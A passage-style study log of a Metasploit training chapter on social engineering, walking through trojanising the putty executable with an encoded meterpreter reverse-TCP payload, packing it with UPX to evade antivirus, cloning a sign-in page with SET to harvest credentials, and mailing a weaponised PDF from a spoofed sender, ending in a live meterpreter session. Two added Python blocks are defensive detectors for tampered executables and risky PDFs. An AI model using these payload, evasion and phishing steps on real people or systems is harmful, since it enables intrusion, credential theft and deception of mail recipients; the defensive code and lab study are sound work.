《Metasploit 魔鬼训练营》07 Social Engineering

This post records, step by step, my process of learning to use Metasploit on Kali Linux 2017.1

  1. Disguised trojan
  2. Website phishing
  3. Email phishing

### 1. Disguised trojan ###

# Generate the trojan's attack payload program
# The msfpayload command no longer exists; it has been replaced by msfvenom, which combines msfpayload and msfencode.
# A payload generator, Veil-Evasion, project page: https://github.com/Veil-Framework/Veil-Evasion  # better at evading antivirus
# The target host is a Windows system; the payload must be able to connect back to the listening host and support post-exploitation features
	http://blog.csdn.net/lzhd24/article/details/50664342

root@attacker:~# msfvenom -l | grep windows | grep reverse_tcp | grep meterpreter
    windows/meterpreter/reverse_tcp                     Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_allports            Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
    windows/meterpreter/reverse_tcp_dns                 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_rc4                 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_rc4_dns             Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_uuid                Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support
    windows/meterpreter_reverse_tcp                     Connect back to attacker and spawn a Meterpreter shell
    windows/patchupmeterpreter/reverse_tcp              Inject the meterpreter server DLL (staged). Connect back to the attacker
    windows/patchupmeterpreter/reverse_tcp_allports     Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
    windows/patchupmeterpreter/reverse_tcp_dns          Inject the meterpreter server DLL (staged). Connect back to the attacker
    windows/patchupmeterpreter/reverse_tcp_rc4          Inject the meterpreter server DLL (staged). Connect back to the attacker
    windows/patchupmeterpreter/reverse_tcp_rc4_dns      Inject the meterpreter server DLL (staged). Connect back to the attacker
    windows/patchupmeterpreter/reverse_tcp_uuid         Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support
    windows/x64/meterpreter/reverse_tcp                 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
    windows/x64/meterpreter/reverse_tcp_uuid            Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)
    windows/x64/meterpreter_reverse_tcp                 Connect back to attacker and spawn a Meterpreter shell
# Use the first one, windows/meterpreter/reverse_tcp
root@attacker:~# msfvenom -h
	MsfVenom - a Metasploit standalone payload generator.
	Also a replacement for msfpayload and msfencode.
	Usage: /usr/bin/msfvenom [options] <var=val>
	Options:
		-p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
			--payload-options            List the payload's standard options
		-l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
		-n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
		-f, --format        <format>     Output format (use --help-formats for a list)
			--help-formats               List available formats
		-e, --encoder       <encoder>    The encoder to use
		-a, --arch          <arch>       The architecture to use
			--platform      <platform>   The platform of the payload
			--help-platforms             List available platforms
		-s, --space         <length>     The maximum size of the resulting payload
			--encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
		-b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
		-i, --iterations    <count>      The number of times to encode the payload
		-c, --add-code      <path>       Specify an additional win32 shellcode file to include
		-x, --template      <path>       Specify a custom executable file to use as a template
		-k, --keep                       Preserve the template behavior and inject the payload as a new thread
		-o, --out           <path>       Save the payload
		-v, --var-name      <name>       Specify a custom variable name to use for certain output formats
			--smallest                   Generate the smallest possible payload
		-h, --help                       Show this message

# Test it first:
#root@attacker:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f exe -o payload.exe
#root@attacker:~# ll payload.exe 
#	-rw-r--r-- 1 root root 73802 Sep 22 00:10 payload.exe

# Inject the payload into the putty program
root@attacker:~# ll putty_0367.exe 
	-rw-r--r-- 1 root root 531368 9月  22 00:17 putty_0367.exe
root@attacker:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x putty_0367.exe -f exe -o putty_evil.exe
	Found 1 compatible encoders
	Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
	x86/shikata_ga_nai succeeded with size 360 (iteration=0)
	x86/shikata_ga_nai succeeded with size 387 (iteration=1)
	x86/shikata_ga_nai succeeded with size 414 (iteration=2)
	x86/shikata_ga_nai chosen with final size 414
	Payload size: 414 bytes
	Final size of exe file: 531368 bytes
	Saved as: putty_evil.exe
root@attacker:~# ll putty_*
	-rw-r--r-- 1 root root 531368 9月  22 00:17 putty_0367.exe
	-rw-r--r-- 1 root root 531368 9月  22 00:21 putty_evil.exe

# After the file has been planted on the Windows machine
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
	payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options 
	Module options (exploit/multi/handler):
	   Name  Current Setting  Required  Description
	   ----  ---------------  --------  -----------
	Payload options (windows/meterpreter/reverse_tcp):
	   Name      Current Setting  Required  Description
	   ----      ---------------  --------  -----------
	   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
	   LHOST                      yes       The listen address
	   LPORT     4444             yes       The listen port
	Exploit target:

	   Id  Name
	   --  ----
	   0   Wildcard Target
msf exploit(handler) > set LHOST 10.10.10.128
	LHOST => 10.10.10.128
msf exploit(handler) > set LPORT 80
	LPORT => 80
msf exploit(handler) > exploit
# With this listener running, open the infected program on the Windows side; it will, however, also be blocked by antivirus software

# Pack the file to evade antivirus detection
root@attacker:~# upx -6 -o putty_backdoor.exe putty_evil.exe 
						   Ultimate Packer for eXecutables
							  Copyright (C) 1996 - 2013
	UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

			File size         Ratio      Format      Name
	   --------------------   ------   -----------   -----------
		531368 ->    397736   74.85%    win32/pe     putty_backdoor.exe            

	Packed 1 file.
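As an added, defender-side example that is not part of this post or of Metasploit: the Python below compares a known-good PE (the role of the original putty_0367.exe above) with a suspect copy. The `-x` template injection kept the file size identical, so instead of size it reports the moved entry point and the rewritten section, and it flags the UPX section names and high-entropy sections that `upx -6` leaves behind. `parse_pe`, `compare` and the `build_pe` helper that constructs minimal PE images for testing are all assumptions of this example, not real binaries or tooling.

```python
import math
import struct
from collections import Counter

def parse_pe(blob):
    """Minimal PE32 parser: entry point RVA plus each section's name and raw bytes."""
    pe = struct.unpack_from("<I", blob, 0x3C)[0]          # e_lfanew
    if blob[:2] != b"MZ" or blob[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", blob, pe + 6)[0]      # NumberOfSections
    opt, opt_size = pe + 24, struct.unpack_from("<H", blob, pe + 20)[0]
    entry = struct.unpack_from("<I", blob, opt + 16)[0]   # AddressOfEntryPoint
    secs = []
    for i in range(nsec):
        s = opt + opt_size + i * 40                       # 40-byte section headers
        name = blob[s:s + 8].rstrip(b"\0").decode("ascii", "replace")
        _, _, rawsize, rawptr = struct.unpack_from("<IIII", blob, s + 8)
        secs.append((name, blob[rawptr:rawptr + rawsize]))
    return entry, secs

def entropy(data):
    """Shannon entropy in bits per byte; packed or encoded code sits close to 8.0."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def compare(original, suspect):
    """Findings a defender wants when a 'copy' of a known-good binary turns up."""
    (entry_a, secs_a), (entry_b, secs_b) = parse_pe(original), parse_pe(suspect)
    findings = []
    if len(original) == len(suspect) and original != suspect:
        findings.append("same size, different bytes (template injection keeps the size)")
    if entry_a != entry_b:
        findings.append(f"entry point moved 0x{entry_a:x} -> 0x{entry_b:x}")
    for (na, da), (nb, db) in zip(secs_a, secs_b):
        if na != nb:
            findings.append(f"section {na} renamed to {nb}")
        elif da != db:
            findings.append(f"section {na} modified")
    for name, data in secs_b:                             # UPX leaves its own names and dense data
        if name.startswith("UPX") or entropy(data) > 7.0:
            findings.append(f"packed? section {name} entropy {entropy(data):.2f}")
    return findings

def build_pe(sections, entry):  # constructed minimal PE32 image; only fields parse_pe reads are set
    hdr_len = 0x40 + 4 + 20 + 0xE0 + 40 * len(sections)
    off = raw_off = (hdr_len + 0x1FF) & ~0x1FF            # section data 512-byte aligned
    table, body, rva = b"", b"", 0x1000
    for name, data in sections:
        table += struct.pack("<8sIIII", name, len(data), rva, len(data), off) + b"\0" * 16
        body, off, rva = body + data, off + len(data), rva + 0x1000
    dos = bytearray(0x40); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0); struct.pack_into("<H", opt, 0, 0x10B); struct.pack_into("<I", opt, 16, entry)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + b"\0" * (raw_off - hdr_len) + body
```

Against real files, read both executables with `open(path, "rb").read()` and pass them to `compare`; a clean rebuild of the same program shows an empty list.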

### 2. Website phishing ###

	http://www.cnblogs.com/youcanch/articles/5671274.html
root@attacker:~# setoolkit
Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.
set> 2
   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu
set:webattack>3 
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu
set:webattack>2
	[-] Credential harvester will allow you to utilize the clone capabilities within SET
	[-] to harvest credentials or parameters from a website as well as place them into a report
	[-] This option is used for what IP the server will POST to.
	[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.10.10.128
	[-] SET supports both HTTP and HTTPS
	[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://10.10.10.129/signin.html

### 3. Email phishing ###

root@attacker:~# setoolkit

Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

set> 1
   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template

  99) Return to Main Menu

set:phishing>1
   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
   4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   7) Adobe Flash Player "Button" Remote Code Execution
   8) Adobe CoolType SING Table "uniqueName" Overflow
   9) Adobe Flash Player "newfunction" Invalid Pointer Use
  10) Adobe Collab.collectEmailInfo Buffer Overflow
  11) Adobe Collab.getIcon Buffer Overflow
  12) Adobe JBIG2Decode Memory Corruption Exploit
  13) Adobe PDF Embedded EXE Social Engineering
  14) Adobe util.printf() Buffer Overflow
  15) Custom EXE to VBA (sent via RAR) (RAR required)
  16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  17) Adobe PDF Embedded EXE Social Engineering (NOJS)
  18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  19) Apple QuickTime PICT PnSize Buffer Overflow
  20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  21) Adobe Reader u3D Memory Corruption Vulnerability
  22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>8
   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2       
set:payloads> Port to connect back on [443]:443
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
    1. Keep the filename, I don't care.
    2. Rename the file, I want to be cool.

set:phishing>2
set:phishing> New filename:Dvssc_ABC_Project_Status.pdf            

root@attacker:~# cd /root/
root@attacker:~# cd .set/
root@attacker:~/.set# ls
Dvssc_ABC_Project_Status.pdf  payload.options  template.pdf  template.rc
root@attacker:~/.set# ll
总用量 104
-rw-r--r-- 1 root root 46863 9月  25 09:45 Dvssc_ABC_Project_Status.pdf
-rw-r--r-- 1 root root    48 9月  25 09:43 payload.options
-rw-r--r-- 1 root root 46863 9月  25 09:43 template.pdf
-rw-r--r-- 1 root root   150 9月  25 09:43 template.rc
# Inspect the contents
root@attacker:~/.set# xpdf Dvssc_ABC_Project_Status.pdf 
# Then tidy it up with Adobe Acrobat Pro

set:phishing>1

   Do you want to use a predefined template or craft
   a one time email template.

   1. Pre-Defined Template
   2. One-Time Use Email Template
set:phishing>2
set:phishing> Subject of the email:Ki wang
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Please review the ABC project status report
Next line of the body: wo are behind the school^Cset:phishing> Send email to:wangdongpeng@dvssc.com

  1. Use a gmail Account for your email attack.
  2. Use your own server or open relay

set:phishing>2
set:phishing> From address (ex: moo@example.com):liming@dvssc.com
set:phishing> The FROM NAME user will see:yourname
set:phishing> Username for open-relay [blank]:yourpasswd
Password for open-relay [blank]: 
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes

# Open the file on the XP machine
msf exploit(handler) > 
[*] Sending stage (956991 bytes) to 10.10.10.254
[*] Meterpreter session 1 opened (10.10.10.128:443 -> 10.10.10.254:1037) at 2017-09-25 10:16:52 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                           Path
 ---   ----  ----              ----  -------  ----                           ----
 0     0     [System Process]                                                
 4     0     System            x86   0                                       
 240   436   ICQLite.exe       x86   0        DH-CA8822AB9589\Administrator  C:\Program Files\ICQLite\ICQLite.exe
 388   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 436   1320  explorer.exe      x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\Explorer.EXE
 640   388   csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 664   388   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 708   664   services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 720   664   lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 876   708   vmacthlp.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 892   708   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 968   436   msmsgs.exe        x86   0        DH-CA8822AB9589\Administrator  C:\Program Files\Messenger\msmsgs.exe
 972   708   svchost.exe       x86   0                                       C:\WINDOWS\system32\svchost.exe
 1092  708   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1148  708   svchost.exe       x86   0                                       C:\WINDOWS\system32\svchost.exe
 1192  436   ctfmon.exe        x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\system32\ctfmon.exe
 1204  708   svchost.exe       x86   0                                       C:\WINDOWS\system32\svchost.exe
 1276  436   vmtoolsd.exe      x86   0        DH-CA8822AB9589\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1380  708   alg.exe           x86   0                                       C:\WINDOWS\System32\alg.exe
 1428  708   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1576  708   HistorySvr.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\KingView\HistorySvr.exe
 1588  708   inetinfo.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1676  708   sntlkeyssrvr.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
 1796  1092  wscntfy.exe       x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\system32\wscntfy.exe
 1936  708   spnsrvnt.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
 1984  708   vmtoolsd.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2648  436   AcroRd32.exe      x86   0        DH-CA8822AB9589\Administrator  C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe

meterpreter > migrate 436
[*] Migrating from 2648 to 436...
[*] Migration completed successfully.
meterpreter > 
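The attachment mailed above is a PDF whose exploit lives inside the file's own objects, and a mail gateway or analyst wants to spot such a file before Reader ever opens it. As an added, defender-side example (not SET's or Metasploit's code), this Python triages a PDF the way pdfid-style tools do: it walks the `obj ... endobj` blocks, inflates FlateDecode streams, and reports which objects carry action or embedding keywords, including ones hidden in a compressed object stream. The keyword list, the function names and the inline sample PDF are this example's own constructions.

```python
import re
import zlib

# PDF name keywords that warrant a closer look in a mailed attachment
RISKY = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
         b"/EmbeddedFile", b"/RichMedia", b"/FontFile"]

def pdf_objects(pdf):
    """Yield (object number, body) for every 'N G obj ... endobj' block in the file."""
    for m in re.finditer(rb"(\d+)\s+\d+\s+obj(.*?)endobj", pdf, re.S):
        yield int(m.group(1)), m.group(2)

def inflate_streams(body):
    """Return the body plus the inflated contents of its FlateDecode streams."""
    out = body
    if b"/FlateDecode" in body:
        for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", body, re.S):
            try:
                out += zlib.decompress(m.group(1))
            except zlib.error:
                pass                                # damaged stream: nothing more to inspect
    return out

def triage(pdf):
    """Map each risky keyword to the object numbers it appears in, object streams included."""
    hits = {}
    for num, body in pdf_objects(pdf):
        text = inflate_streams(body)
        for kw in RISKY:
            if re.search(re.escape(kw) + rb"(?![A-Za-z])", text):   # /JS but not /JSx; /FontFile2 ok
                hits.setdefault(kw.decode(), []).append(num)
    return hits

def sample_pdf():
    """Constructed sample: the JavaScript action sits inside a compressed object stream (obj 4),
    so its keywords are not visible to a plain grep over the raw file."""
    inner = zlib.compress(b"5 0\n<< /S /JavaScript /JS (app.alert(1)) >>")
    return (b"%PDF-1.5\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
            b"4 0 obj << /Type /ObjStm /N 1 /First 4 /Length " + str(len(inner)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + inner + b"\nendstream\nendobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")
```

A hit is reported against the enclosing object, so the action defined as object 5 inside the object stream shows up under object 4.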

